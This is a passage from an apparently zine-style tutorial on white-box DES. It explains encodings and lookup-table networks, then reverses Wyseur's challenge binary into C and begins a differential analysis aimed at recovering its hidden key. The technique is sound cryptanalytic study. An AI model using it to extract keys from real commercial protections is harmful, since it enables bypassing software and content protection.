positions are written from 1 to 32. As you may have noticed, the 16 bits from columns 3 and 4 are not duplicated. They are called the middle bits, we will see later why they are important. The P-Box --------- The P-Box is a bit permutation which means that every bit of input will have a new position in the output. Such a transformation is linear and can be represented by a bit matrix. When combined with a XOR operation with a constant, this is what we call an affine transformation (AT). ----[ 5.2 - An overview of DES WB primitives The first WB DES implementation was presented in [R09]. Explaining how and why DES white-box were designed is not the most simple of the task especially with an ASCII / 75 columns constraint ;> I'll try to focus on the main mechanisms so that you can get a global picture with the next section. At some point you may however feel lost. In that case, please read the excellent [R15] <3 The protection of I/O --------------------- The reverser is able to intercept every step of the algorithm as well as to examine all the memory. This gives him a huge advantage as he can easily trace all inputs and outputs of elementary functions of the WB. In the case of DES, this is even easier thanks to the very nature of Feistel network. For example an attacker would easily locate the output of the P-Box in round (r) because it is combined with part of the input: L(r). To mitigate this, several transformations are performed: a) All elementary operations of the white-box are performed on 96 bits states. Let's try to understand why. Initially a native DES round begins which the 64 bits state L(r) || R(r). R(r) is then extended using the E-box to generate a 8x6 = 48 bits buffer and at the same time, L(r) and R(r) are still part of the internal state because they are still contributing to the round's operations: ************** ************** * L(r) * * R(r) * ************** ************** | .------------| 32b | | v | | .-------------------. 32b | 32b | | E-box | | | '-------------------' | | | 48b v v v Mem1 Mem2 Mem3 At this point the internal state is composed of 32 x 2 + 48 = 112 bits which is the maximum required size before being shrunken to a 64 bits state at the end of the round: L(r+1) || R(r+1). To avoid any information leak, a unique -constant size- state is used to hide the position of the bits. If you remember 5.1 paragraph, the E-Box is duplicating 16 out of the 32 bits of R(r). As a result, constructing 'Mem2' can be done extracting 16 bits out of R(r) and the 16 remaining ones out of 'Mem3'. With this property, the internal state is composed of 96 bits. Here is a diagram ripped from [R17] to understand how the primitive is modified to handle this 96 bits state: 32b 48b 16b ************** ********************* ******** state 1: * L(r) * * X(r) * * r(r) * ************** ********************* ******** | | | | | v | | | ********* ..... | v | * sK(r) *--> . + . | .-------. | ********* ..... '-->( Merge ) | | '-------' | v | | .-------------. | | \ S / | | '---------' | | | | 32b v v 32b 32b v ************** *************** *************** state 2: * L(r) * * Y(r+1) * * R(r) * ************** *************** *************** | | | v | | ..... .--------. | | . + .<---| P |<-' | ..... '--------' | | | 32b '----------------------------------. | | | .-------------------|-----------' | | 32b v v 32b | .-------. .------. | / E-box \ ( Select ) | 32b '-----------' '------' | | | v 48b v v 16b ************** ********************* ******** state 3: * L(r+1) * * X(r+1) * *r(r+1)* ************** ********************* ******** With: - sK(r) being the subkey of round r - X(r) being the output of the E-box of round r-1 - Y(r) being the output of the SBox of round r-1 - r(r) being the complementary bits so that X(r) and r(r) is a duplication of R(r) b) Input and outputs between elementary operations are protected using what is called the "internal encodings". These encodings are applied to functions implemented as lookup tables. Let's take an example. You are chaining f() and g() which means that you are calculating the composition g() o f(). Obviously without any protection, an attacker can intercept the result of f() at debug time (e.g. by putting a breakpoint at the entry of g()) Now if you want to protect it, you can generate a random bijection h() and replace f() and g() by F() and G() where: F() = h() o f() G() = g() o h()^-1 Note: Again this is a mere example, we do not care about the {co}domain consideration. These functions are evaluated and then expressed as lookup tables. Obviously this will not change the output as: G() o F() = (g() o h()^-1) o (h() o f()) = g() o (h()^-1 o h()) o f() [associativity] = g() o f() But the difference is that intercepting the output of F() doesn't give the output of f(). Pretty cool trick, right? However I've just written that WB DES implementations were always manipulating 96 bits states. Then does it mean that we need lookup tables of 2^96 entries? No, this would be troublesome ;> We can use the so called "path splitting" technique. Consider the example of a 32 bits buffer. To avoid using a huge lookup table, you can consider that this buffer is an 8 bits array. Each element of the array will then be obfuscated using a corresponding 8 bits lookup table as described below: ***************************************** * IN[0] || IN[1] || IN[2] || IN[3] * ***************************************** | | | | | | | | v v v v .-------. .-------. .-------. .-------. | 2^8 B | | 2^8 B | | 2^8 B | | 2^8 B | '-------' '-------' '-------' '-------' | | | | | | | | v v v v ***************************************** * OUT[0] || OUT[1] || OUT[2] || OUT[3] * ***************************************** I took the example of an 8 bits array but I could have used any size. Something really important to understand: the smaller the lookup table is, the more it will leak us information. Keep it in mind. c) Do you remember when I said that a WB implementation was the exact implementation of the corresponding crypto primitive? Well it's not true. Or you could say that I was simplifying things ^_~ Most of the time (in real life), WB_DES() is a G() o DES() o F() where F() and G() are encoding functions. So the first input (plaintext) and the last output (ciphertext) may be obfuscated as well. This is called an "external encoding" and this is used to harden the white-box implementation. Indeed if there were no such functions, first & last rounds would be weaker than other rounds. This 'academic' protection aims at preventing trivial key recovery attacks. A WB implementation without external encoding is said to be 'naked'. In the context of real life protections, it may (or may not) be associated with an additional layer to protect the I/O before & after the encryption. It would be bad to intercept the plaintext once decrypted, right? Commercial protections almost never use native implementations for (at least) this reason. Intercepting a plaintext is indeed far easier than recovering the encryption key. In the WB DES case, common academic designs use affine functions, encoded or not. Transforming DES functions -------------------------- Now that we've had an overview of how I/O were protected between elementary functions, let's see how we can build said functions. a) The partial evaluation This is probably the most intuitive part of the WB implementation. This is about 'fusing' the S-Boxes with the round-keys. This is exactly what was performed in the previous AES challenge. If you can remember, this is also the first example that I gave at the beginning of the paper to introduce the white-boxing concept. Using the previous diagram, it means that we want to convert this step: 32b 48b 16b ************** ********************* ******** * L(r) * * X(r) * * r(r) * ************** ********************* ******** | | | | | v | | | ****** ..... | v | * sK *--> . + . | .-------. | ****** ..... '-->( Merge ) | | '-------' | v | | .-------------. | | \ S / | | '---------' | | | | 32b v v 32b 32b v ************** *************** ************** * L(r) * * Y(r+1) * * R(r) * ************** *************** ************** into this one: ********************************************* * state 1 (12 x 8 = 96 bits) * ********************************************* | | | | v v v v .-----..-----..-----. .-----. | T0 || T1 || T2 | ... | T11 | '-----''-----''-----' '-----' | | | | v v v v ********************************************* * state 2 (96 bits) * ********************************************* A lookup table Ti (mapping a byte to a byte) is called a 'T-Box'. There are two types of T-Box because of the heterogeneity of the operations performed on the state: - The non neutral T-box. They are the 8 T-boxes involved with the Sbox and the XOR. Each of them is concealing an Sbox and a subkey mixing. input: -> 6 bits from X(r) to be mixed with the subkey -> 1 bit from L(r) or r(r) -> 1 bit from L(r) or r(r) output: -> 4 bits from the Sbox -> 2 bits from X(r) taken from the input before being mixed with the subkey -> 1 bit from L(r) or r(r) -> 1 bit from L(r) or r(r) - The neutral T-box which are only used to connect bits of state 1 to bits of state 2. For example the bits of L(r) are never involved in any operation between state 1 and state 2. input: -> 1 bit from L(r) or r(r) -> 1 bit from L(r) or r(r) [...] -> 1 bit from L(r) or r(r) output: -> the input (permuted) Keep in mind that in each case, you have a 'nibble view' of both inputs and outputs. Moreover, permutations are used to make harder the localization of Sbox upon a simple observation. To have a better understanding of this point as well as associated security explanations I recommend to read [R09]. b) The AT transformation We now want to transform this: ************** *************** *************** state 2: * L(r) * * Y(r+1) * * R(r) * ************** *************** *************** | | | v | | ..... .--------. | | . + .<---| P |<-' | ..... '--------' | | | 32b '----------------------------------. | | | .-------------------|-----------' | | 32b v v 32b | .-------. .------. | / E-box \ ( Select ) | 32b '-----------' '------' | | | v 48b v v 16b ************** ********************* ******** state 3: * L(r+1) * * X(r+1) * *r(r+1)* ************** ********************* ******** into this: ********************************************* * state 2 (96 bits) * ********************************************* | | | | v v v ... v ????????????????????????????????????????????? | | | ... | v v v v ********************************************* * state 3 (96 bits) * ********************************************* To put it simply, and as said earlier, the combination of the P-Box and the following XOR is an affine function. Because we want to use lookup tables to implement it we will have to use a matrix decomposition. Let's take an example. You want to protect a 8x8 bit-matrix multiplication. This matrix (M) can be divided into 16 2x2 submatrix as shown below: .----. .----.----.----.----. .----. | Y0 | | A | B | C | D | | X0 | .----. .----.----.----.----. '----' | Y1 | | E | F | G | H | | X1 | .----. = .----.----.----.----. x .----. | Y2 | | I | J | K | L | | X2 | .----. .----.----.----.----. .----. | Y3 | | M | N | O | P | | X3 | '----' '----'----'----'----' '----' Vector Y Matrix M Vector X Here the Yi and Xi are 2 bits sub-vectors while A,B,C,etc. are 2x2 bit-submatrix. Let's focus on Y0, you can write: Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3 Because A,B,C and D are constants it's possible to evaluate the multiplications and build the corresponding lookup tables (Li). This gives the following diagram: ****** ****** ****** ****** * X0 * * X1 * * X2 * * X3 * ****** ****** ****** ****** | | | | v v v v .----. .----. .----. .----. | L0 | | L1 | | L3 | | L4 | '----' '----' '----' '----' | | | | | ..... | | ..... | '->. + .<-' '->. + .<-' ..... ..... | | | ..... | '------>. + .<------' ..... | v ****** * Y0 * ****** You may object (and you would be right) that information is still leaking and that it would be easy to retrieve the original matrix. Well it's true. Thus to avoid this kind of situation two techniques are used: - Each XOR operation is hidden inside a lookup table. In our example, the resulting lookup tables have 2^(2x2) = 16 entries and 2^2 = 4 outputs (hence a size of 4x16 = 64 bits). - Internal encoding (remember the previous explanations) is used to protect the I/O between the lookup tables. Our matrix multiplication becomes: ****** ****** ****** ****** * X0 * * X1 * * X2 * * X3 * ****** ****** ****** ****** | | | | v v v v 2b 2b 2b 2b <----><----> <----><----> .----------. .----------. \ S0 / \ S1 / '------' '------' <----> <----> 2b 2b \ / \ / | | v v 2b 2b <----><----> .---------. \ S2 / '------' <----> 2b | v ****** * Y0 * ****** This is called an 'encoded network'. The main side effect of this construction is the important number of lookup tables required. --[ 6 - Breaking the second case: Wyseur's challenge ----[ 6.1 - Reverse engineering of the binary As far as I can tell, there is an obvious need to rewrite the binary as C code because: - We need to understand exactly what's going on from a mathematical point of view and C is more suitable than ASM for that purpose - Rewriting the functions will allow us to manipulate them easily with our tools. This is not mandatory though because we could be using debugging functions on the original binary itself. Again I won't detail all the reverse engineering process because this is neither the main topic nor very hard anyway compared to what you may find in the wild (in commercial protections). High level overview -------------------- Let's begin by running the executable: --------------------------------------------------------------------------- $ ./wbDES.orig Usage: ./wbDES.orig Where is an 8-byte hexadecimal representation of the input to be encrypted Example: ./wbDES.orig 12 32 e7 d3 0f f1 29 b3 --------------------------------------------------------------------------- OK so we need to provide the 8 bytes of the plaintext as separate arguments in the command line. Hum, weird but OK. When the binary is executed, the first thing performed is a conversion of the arguments because obviously a suitable buffer for cryptographic operations is necessary. The corresponding instructions were rewritten as the following C function: --------------------------------------------------------------------------- // I even emulated a bug, will you find it? ;> inline void convert_args(char **argv) { int i = 0; // ebp-50h while(i <= 7) { char c; c = argv[1+i][0]; if(c <= '9') { c -= '0'; // 0x30 = integer offset in ASCII table in[i] = (c<<4); } else { c -= ('a' - 10); in[i] = (c<<4); } c = argv[1+i][1]; if(c <= '9') { c -= '0'; // 0x30 = integer offset in ASCII table in[i] ^= c; } else { c -= ('a' - 10); in[i] ^= c; } i++; } return; } --------------------------------------------------------------------------- Once the job is done, an 8 bytes buffer (in[8], the plaintext) is built. This is where serious business begins. Thanks to the Control Flow Graph provided by your favorite disassembler, you will quickly identify 3 pseudo functions* : - wb_init(): 0x0804863F to 0x08048C1D This code takes an 8 bytes buffer, returns 1 byte and is called 12 times by main(). Thanks to this, a 12 x 8 = 96 bits buffer is built. As said earlier, the WB is operating on 96 bits states so this is most likely the initialization function. - wb_round(): 0x08048C65 to 0x08049731 This code takes the 12 bytes buffer generated by wb_init() as input and modifies it. The function is called 16 times by main(). Because 16 is exactly the number of DES rounds, assuming it is the round function seems fair. - wb_final(): 0x08049765 to 0x08049E67 This code takes the last buffer returned by wb_round() as input and returns an 8 bytes buffer which is printed on the screen. So we can assume that this is the termination function in charge of building the DES ciphertext out of the last internal state. *: There is no 'function' in this program, probably because of an inlining, but we can still distinguish logical parts. You may argue that attributing roles to wb_init, wb_round and wb_final is a bit hasty but there is something interesting in the code: symbols! In each of these functions, an array of lookup tables is used and named 'Initialize', 'RoundAffineNetwork' and 'FinalRoundNetwork' in the corresponding functions. Convenient isn't it? Usually in commercial protections, engineers will take care of little details such as this and try to avoid leaking any information. In this case however, it can be assumed that the focus is on the cryptography as there are neither anti-debugs nor anti-disassembling protections so it should be safe to trust our intuition. Thanks to this first reverse engineering step, we're able to rewrite a similar main function: -------------------------------- wb_main.c -------------------------------- unsigned char in[8]; // ebp-1Ch unsigned char out[12]; // ebp-28h unsigned char temp[12]; // ebp-34h [...] int main(int argc, char **argv) { if( argc != 9) { printf(usage, argv[0], argv[0]); return 0; } /* Fill the in buffer */ convert_args(argv); /* and print it :) */ printf("\nINPUT: "); for(j=0; j<8; j++) printf("%02x ", in[j]); /* WB initialisation */ for(j=0; j<12; j++) wb_init(j); round_nbr = 0; for(round_nbr=0; round_nbr<15; round_nbr++) { memcpy(temp, out, 12); wb_round(); } /* Building the final buffer */ printf("\nOUTPUT: "); for(j=0; j<8; j++) wb_final(j); printf("\n"); return 0; } -------------------------------- wb_main.c -------------------------------- One hint to speed up things: always focus first on the size and nature of buffers transmitted to the different sub-functions. Reversing wb_init() ------------------- It is now time to have a look at the first function. Again I won't detail the whole reverse engineering but rather give you a few explanations: - Whenever the function is called, it uses a set of 15 lookup tables whose addresses are dependent of both the index in the output array and the index of the box itself (amongst the 15 used by the function). This means that the sets of tables used to calculate OUT[x] and OUT[y] when x!=y are (likely to be) different and for a same OUT[x], different tables will be applied to IN[a] and IN[b] if a!=b. - All of these lookup tables are located at: Initialize + 256*idx_box + OUT_idx*0xF00 where: > idx_box is the index of the box amongst the 15 > OUT_idx is the index in the output array (OUT) - The tables are static. Thanks to this property we can dump them whenever we want. I chose to write a little GDB script (available in appendix) to perform this task. The export is an array of lookup tables (iBOX_i) written in C language. - wb_init() is performing operations on nibbles (4 bits) so for a particular output byte (OUT[m]), the generation of the 4 least significant bits is independent of the generation of the 4 most significant ones. Now with this information in mind, let's have a look at the reversed wb_init() function: -------------------------------- wb_init.c -------------------------------- unsigned char p[8]; inline void wb_init( int m // ebp-48h ) { unsigned int temp0; // ebp-228h unsigned int temp1; // ebp-224h [...] unsigned int temp23; // ebp-1CCh unsigned int eax,ebx,ecx,edx,edi,esi; bzero(p,sizeof p); p[0] = iBOX_0[m][in[0]]; p[1] = iBOX_1[m][in[1]]; p[2] = iBOX_2[m][in[2]]; p[3] = iBOX_3[m][in[3]]; p[4] = iBOX_4[m][in[4]]; p[5] = iBOX_5[m][in[5]]; p[6] = iBOX_6[m][in[6]]; p[7] = iBOX_7[m][in[7]]; // First nibble ecx = (0xF0 & p[0]) ^ ( p[1] >> 4 ); temp3 = 0xF0 & iBOX_8[m][ecx]; ecx = (0xF0 & p[2]) ^ ( p[3] >> 4 ); eax = iBOX_9[m][ecx] >> 4; ecx = temp3 ^ eax; temp6 = 0xF0 & iBOX_12[m][ecx]; ecx = (0xF0 & p[4]) ^ ( p[5] >> 4 ); eax = iBOX_10[m][ecx] >> 4; ecx = temp6 ^ eax; edi = 0xF0 & iBOX_13[m][ecx]; ecx = (0xF0 & p[6]) ^ ( p[7] >> 4 ); eax = iBOX_11[m][ecx] >> 4; ecx = edi ^ eax; edx = iBOX_14[m][ecx]; esi = edx & 0xFFFFFFF0; // Second nibble ecx = (0x0F & p[1]) ^ (0xF0 & ( p[0] << 4 )); temp15 = 0xF0 & ( iBOX_8[m][ecx] << 4); ecx = (0x0F & p[3]) ^ (0xF0 & ( p[2] << 4 )); eax = 0x0F & ( iBOX_9[m][ecx] ); ecx = temp15 ^ eax; temp18 = 0xF0 & ( iBOX_12[m][ecx] << 4 ); ecx = (0x0F & p[5]) ^ (0xF0 & ( p[4] << 4 )); eax = 0x0F & iBOX_10[m][ecx]; ecx = temp18 ^ eax; temp21 = 0xF0 & (iBOX_13[m][ecx] << 4); ecx = (0x0F & p[7]) ^ (0xF0 & ( p[6] << 4 )); eax = 0x0F & ( iBOX_11[m][ecx] ); ecx = temp21 ^ eax; eax = 0x0F & ( iBOX_14[m][ecx] ); // Output is the combination of both nibbles eax = eax ^ esi; out[m] = (char)eax; return; } -------------------------------- wb_init.c -------------------------------- In a nutshell: - & (AND) and >>/<< (SHIFTS) are used to operate on nibbles - ^ (XOR) are used to concatenate nibbles in order to build the entries (which are bytes) of the iBOX_i lookup tables - The output byte out[m] is the concatenation of two independently calculated nibbles To understand exactly what's going on, a drawing is much clearer. So thanks to asciio [R11] this gives us something like this: ******** ******** ******** ******** ******** ******** ******** ******** * IN_0 * * IN_1 * * IN_2 * * IN_3 * * IN_4 * * IN_5 * * IN_6 * * IN_7 * ******** ******** ******** ******** ******** ******** ******** ******** | | | | | | | | H | H | H | H | H | H | H | H | v v v v v v v v <----------------------------- 8x8 = 64 bits ---------------------------> .-------..-------. .-------..-------. .-------..-------. .-------..-------. \iBox_0 /\iBox_1 / \iBox_2 /\iBox_3 / \iBox_4 /\iBox_5 / \iBox_6 /\iBox_7 / '-----' '-----' '-----' '-----' '-----' '-----' '-----' '-----' <----------------------------- 8x4 = 32 bits -------------------------> \ / \ / \ / \ / H \ / H H \ / H H \ / H H \ / H v v v v v v v v .---------. .---------. .---------. .---------. \ iBox_8 / \ iBox_9 / \ iBox_10 / \ iBox_11 / '-------' '-------' '-------' '-------' <------------------------- 4x4 = 16 bits ----------------------> \ / \ / H \ / H H \ / H \ / \ / v v v v .---------. .---------. \ iBox_12 / \ iBox_13 / '-------' '-------' <--------------- 2x4 = 8 bits -----------> \ / \ H H / '---------. .---------' | | v v .---------. \ iBox_14 / '-------' <- 1x4 bits -> \ H \ 8 bits \ <---------> Concatenation '---> *********** of nibbles * OUT_x * .---> *********** / L / / <- 1x4 bits -> .-------. / iBox_14 \ '---------' ^ ^ L | | L .--------' '--------. / \ / \ <--------------- 2x4 = 8 bits -----------> .-------. .-------. / iBox_12 \ / iBox_13 \ '---------' '---------' ^ ^ ^ ^ / \ / \ L / \ L L / \ L / \ / \ <------------------------- 4x4 = 16 bits ----------------------> .-------. .-------. .-------. .-------. / iBox_8 \ / iBox_9 \ / iBox_10 \ / iBox_11 \ '---------' '---------' '---------' '---------' ^ ^ ^ ^ ^ ^ ^ ^ L / \ L L / \ L L / \ L L / \ L / \ / \ / \ / \ <----------------------------- 8x4 = 32 bits -------------------------> .-----. .-----. .-----. .-----. .-----. .-----. .-----. .-----. /iBox_0 \/iBox_1 \ /iBox_2 \/iBox_3 \ /iBox_4 \/iBox_5 \ /iBox_6 \/iBox_7 \ '-------''-------' '-------''-------' '-------''-------' '-------''-------' <----------------------------- 8x8 = 64 bits ---------------------------> ^ ^ ^ ^ ^ ^ ^ ^ L | L | L | L | L | L | L | L | | | | | | | | | ******** ******** ******** ******** ******** ******** ******** ******** * IN_0 * * IN_1 * * IN_2 * * IN_3 * * IN_4 * * IN_5 * * IN_6 * * IN_7 * ******** ******** ******** ******** ******** ******** ******** ******** In this case, 'H' is used as a suffix to identify the most significant (High) nibble of a particular byte. As you can see, the input (respectively the output) is not an 8 (respectively 12) _bytes_ array but rather a 16 (respectively 24) _nibbles_ array. Indeed, each byte array (iBox_i) stores exactly 2 lookup tables. We say that such lookup tables are 'compacted', see [R14] for additional details. Global description ------------------- Good news guys, the wb_init(), wb_round() and wb_final() functions are composed of the same nibble oriented patterns. So basically wb_round() and wb_final() contain also AT applied to a nibbles array and the end of the reverse engineering is quite straightforward. Remark: Manipulating nibbles implies that the internal encoding is performed using 4 bits to 4 bits bijections. Again thanks to asciio, we're able to draw something like that: 8 x (2x4) = 64 bits <----------------------------------> 2x4 = 8 bits <----> .----------------------------------. .-----------. | .-----. .-----. .-----. | | INPUT | .----| IN0 | | IN1 | ... | IN7 | | '-----------' | | '-----' '-----' '-----' | | v '------------|----------------|----' v | v | .------------. |--------<---------------<-------' ( wb_init func ) | '------------' .-----v---------------------------------------------. | |.--------. .--------. .---------.| | || STG0_0 | | STG0_1 | ... | STG0_11 || | |'--------' '--------' '---------'| | '-----|---------|-----------------------------|-----' | | | | v | v | .-------------. | | | ( wb_round func ) '--->-----|-------<---------------------' '-------------' | | .---------------|------------------------------------. | |.--------. .---v----. .---------.| | || STG1_0 | | STG1_1 | ... | STG1_11 || | |'--------' '--------' '---------'| | '----------------------------------------------------' | | 2x4bits | <--------> 12 x (2x4) = 96 bits | <----------------------------------------------------> | v .-------------. ... 15x ( wb_round func ) '-------------' .----------------------------------------------------. | |.---------..---------. .----------.| | || STG14_0 || STG14_1 | ... | STG14_11 || | |'---------''---------' '----------'| | '-----|--------|-------------------------------|-----' v | v | .-------------. | | | ( wb_final func ) '----->-----<----------------------------' '-------------' | | .-----|----------------------------. v |.----v-. .------. .------.| .----------. || OUT0 | | OUT1 | ... | OUT7 || | OUTPUT | |'------' '------' '------'| '----------' '----------------------------------' 2x4bits <------> 8 x (2x4) = 64 bits <----------------------------------> Writing the C code corresponding to these functions is not difficult though a bit boring (not to mention prone to mistakes). I was able to rewrite the whole binary in a few hours (and it took me almost the same time to make it work :O). The source code is available in the appendix. Remark: I've not tried to use Hex-Rays on the binary but it could be interesting to know if the decompilation is working out of the box. It's easy to see that my source code is functionally equivalent on the input/output behavior: --------------------------------------------------------------------------- $ ./wbDES.orig 11 22 ff dd 00 11 26 93 <- the original INPUT: 11 22 ff dd 00 11 26 93 OUTPUT: 04 e9 ff 8e 2e 98 6c 6b $ make $ ./wbdes.try 11 22 ff dd 00 11 26 93 <- my copy :) INPUT: 11 22 ff dd 00 11 26 93 OUTPUT: 04 e9 ff 8e 2e 98 6c 6b $ --------------------------------------------------------------------------- Now let's try to break the white-box. We will proceed in two steps which is exactly how I handled the challenge. What is described is how I proceeded as I wasn't following academic publications. I don't know if it's a better approach or not. It's just my way of doing things and because I'm not a cryptographer, it's _practical_. If you prefer more _theoretical_ solutions, please refer to [R04] for a list of papers dealing with the subject. ----[ 6.2 - The discovery step First of all, let's gather some information about this white-box. There is a first immediate observation: there is no explicit T-box step which proves that it is combined with the AT step in a same function. This is an optimization which was historically proposed in [R14] in order to protect the output of the T-box and, as a result, to mitigate the so-called statistical bucketing attack described in [R09] while compressing the implementation by merging operations. I used this information as well as the size of the binary (which is a bit more than the size of the lookup tables) as indicators of how recent the design could be. I didn't have the time to read all the white-box related papers (although there are not a thousand of them). Analyzing the wb_init() ----------------------- Earlier, I've made assumptions about wb_init() and wb_round() but at this point little is really known about them. Now is the time to play a bit with wb_init() and by playing I mean discovering the "link" between the input (plaintext) and the input of wb_round() which will be called "stage0" from now on. Let's begin by a quick observation. As said before, for each output byte of wb_init(), there is a corresponding set of 14 (condensed) iBox_i. A simple glance at these boxes is enough to determine that for each set, the 8 first iBox_i have a very low entropy. Conversely, the remaining 5 ones have a high entropy: --------------------------------------------------------------------------- [...] unsigned char iBOX_3[12][256] = { { 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7, 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7, 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7, 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7, 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7, [...] 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1, 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1, }, [...] unsigned char iBOX_8[12][256] = { { 0x13,0xdf,0xf9,0x38,0x61,0xe2,0x44,0x9e,0xc0,0x2a,0x0b,0xb7,0x7c,0xad, 0x56,0x85,0x96,0xbe,0x8b,0x04,0x27,0xcd,0xa8,0x1f,0xec,0x65,0x39,0xd1, 0x50,0x42,0x73,0xfa,0x4a,0x52,0x04,0x8b,0xcc,0x2f,0x19,0xad,0x67,0xe3, [...] 0x8a,0x08,0xbd,0x59,0x36,0xf1,0xef,0x45,0x13,0xd4,0x90,0x67,0xae,0x76, 0x3c,0xf7,0xe4,0x65,0x91,0x43,0x2b,0xcd,0x80,0x58,0xd9,0x1a,0xbf,0x02, }, [...] --------------------------------------------------------------------------- The example shows us that iBOX_3[0] has only 2 possibles values: 0xf7 for any index inferior or equal to 127 and 0xf1 for the remaining ones. Said otherwise, this box is a bit filter: - High output nibble: only 1 possible value (0xf) => no bit chosen - Low output nibble: 2 possible values (0x1, 0x7) => the input's MSB is chosen Let's visualize the effect of the 8 first iBox_i for every output nibble. To see if the particular bit at position 'i' is involved in the LUT 'p' then you can compute: - p[0]&0xf0 and p[(1< bit 6 -> bit 49 -> bit 57 -> bit 56 OUT[0] (low) is composed of: -> bit 24 -> bit 32 -> bit 40 -> bit 48 [...] OUT[11] (high) is composed of: -> bit 7 -> bit 15 -> bit 23 -> bit 31 OUT[11] (low) is composed of: -> bit 14 -> bit 22 -> bit 46 -> bit 54 [+] Total nbr of bits involved = 96 [...] --------------------------------------------------------------------------- So the analysis of the 8 first LUT reveals that each output (OUT[i]) nibble is linked to exactly 4 input bits. So the 8 first iBox_i are no more than an obfuscated linear mapping. A good idea is to focus more specifically on the input bits frequency: --------------------------------------------------------------------------- $ ./entropy [...] [+] Nbr of times a bit is used [b_00] 2 [b_01] 1 [b_02] 2 [b_03] 1 [b_04] 2 [b_05] 1 [b_06] 2 [b_07] 1 [b_08] 2 [b_09] 1 [b_10] 2 [b_11] 1 [b_12] 2 [b_13] 1 [b_14] 2 [b_15] 1 [b_16] 2 [b_17] 1 [b_18] 2 [b_19] 1 [b_20] 2 [b_21] 1 [b_22] 2 [b_23] 1 [b_24] 2 [b_25] 1 [b_26] 2 [b_27] 1 [b_28] 2 [b_29] 1 [b_30] 2 [b_31] 1 [b_32] 2 [b_33] 1 [b_34] 2 [b_35] 1 [b_36] 2 [b_37] 1 [b_38] 2 [b_39] 1 [b_40] 2 [b_41] 1 [b_42] 2 [b_43] 1 [b_44] 2 [b_45] 1 [b_46] 2 [b_47] 1 [b_48] 2 [b_49] 1 [b_50] 2 [b_51] 1 [b_52] 2 [b_53] 1 [b_54] 2 [b_55] 1 [b_56] 2 [b_57] 1 [b_58] 2 [b_59] 1 [b_60] 2 [b_61] 1 [b_62] 2 [b_63] 1 $ --------------------------------------------------------------------------- The even bits are used exactly twice while odd ones are only used once (here odd and even both refer to the position). Or you could say that even bits are duplicated in the internal state built after this step. Anybody familiar with the DES knows that the IP(X) function of the DES gives the internal state L || R where: - L is an array composed of the odd bits of X - R is an array composed of the even bits of X In an academic WB DES implementation, building the 96 bits state is performed using the duplication of even bits (R). This is because these bits are necessary as both input of the E-box and output of the DES round function (see my previous description of DES). So we have an obvious match and it's a clear indication that there is no external encoding applied to the input (and as a consequence probably none applied to the output as well). More precisely there could still be a bit permutation on both L & R bits but it sounds like a silly hypothesis so let's forget about that. What would be the point? --- Now let's continue with the differential analysis of the full wb_init(). This step is much more intuitive. Think about it: if you want to discover the nibbles of stage0 (the output of wb_init) influenced by a specific input bit then apply wb_init() to two inputs whose only difference is this bit. Then calculate the XOR of both results and the non null nibbles are the ones which are affected. This was greatly inspired by [R09]. --------------------------------------------------------------------------- $ ./entropy [...] [+] Differential cryptanalysis on wb_init() -> b_00 :: 00 04 20 00 00 00 00 00 00 00 00 00 -> b_01 :: 00 00 00 40 00 00 00 00 00 00 00 00 -> b_02 :: 00 00 00 09 d0 00 00 00 00 00 00 00 -> b_03 :: 00 00 00 00 00 00 00 90 00 00 00 00 -> b_04 :: 00 00 00 00 00 0e 60 00 00 00 00 00 -> b_05 :: 00 00 00 00 00 00 00 00 00 50 00 00 -> b_06 :: 80 00 00 00 00 00 00 05 00 00 00 00 -> b_07 :: 00 00 00 00 00 00 00 00 00 00 00 b0 -> b_08 :: 00 07 00 00 00 00 00 00 01 00 00 00 -> b_09 :: 00 00 00 f0 00 00 00 00 00 00 00 00 -> b_10 :: 00 00 00 06 00 00 00 00 00 03 00 00 [...] --------------------------------------------------------------------------- So for even bits there are 2 nibbles affected and only one for odd bits. Not only does it confirm our previous hypothesis but it also reveals the position (the index in the nibble array) of the bits in the WB internal state (up to 1/2 probability for even bits). This is particularly interesting when it comes to locate S-box for example ;-) Analyzing the first wb_round() ------------------------------ To analyze this function, one clever trick is to make use of the odd bits (L0) and perform a differential analysis. Natively, the DES satisfies the following system of equations: L1 = R0 R1 = L0 [+] f(R0,K0) With L0 || R0 being the result of IP(plaintext) K0 being the first subkey Let's now consider two plaintexts (A and B). The first one is composed of bits all set to 0 (L0_A || R0_A) whereas the second one ((L0_B || R0_B) has a weight of 1 and more specifically, its sole bit set to 1 is in L0. Remark: While there is only one A, there are obviously 32 possible B. We can thus write thanks to the previous equations: L1_A = R0_A = 0 R1_A = L0_A [+] f(R0_A,K0) = f(0,K0) And L1_B = R0_B = 0 R1_B = L0_B [+] f(R0_B,K0) = L0_B [+] f(0,K0) (Again please excuse the lazy notation) This finally gives us: DELTA(L1||R1)(A,B) = ( L1_A [+] L1_B || R1_A [+] R1_B ) = ( 0 [+] 0 || f(0,K0) [+] L0_B [+] f(0,K0) ) = ( 0 || L0_B ) We know that L0_B's weight is 1 so in a native DES the modification of one bit in L0 induces the modification of a unique bit in the output of the DES round function. In an obfuscated context, this means that only one output nibble is modified and calculating DELTA (the result of the so called differential analysis if you prefer) is merely a trick to identify it easily. Now that you've grasped the main idea, let's work on the real WB. Again consider plaintexts A and B which give (L0_A || R0_A) and (L0_B || R0_B) after IP(). Because wb_round() includes the E-box and produces a 96 bits output state, we now have to consider an additional transformation: X (64b) ---> [ wb_init + first wb_round ] ----> Y (96b) Here Y is the output of wb_round. Following the design in academic publications we can write: Y = RP ( L1 || X1 || r1 ) (RP = Random bit Permutation used to hide the position of bits in the obfuscated output.) With: - L1 being R0 (from DES round 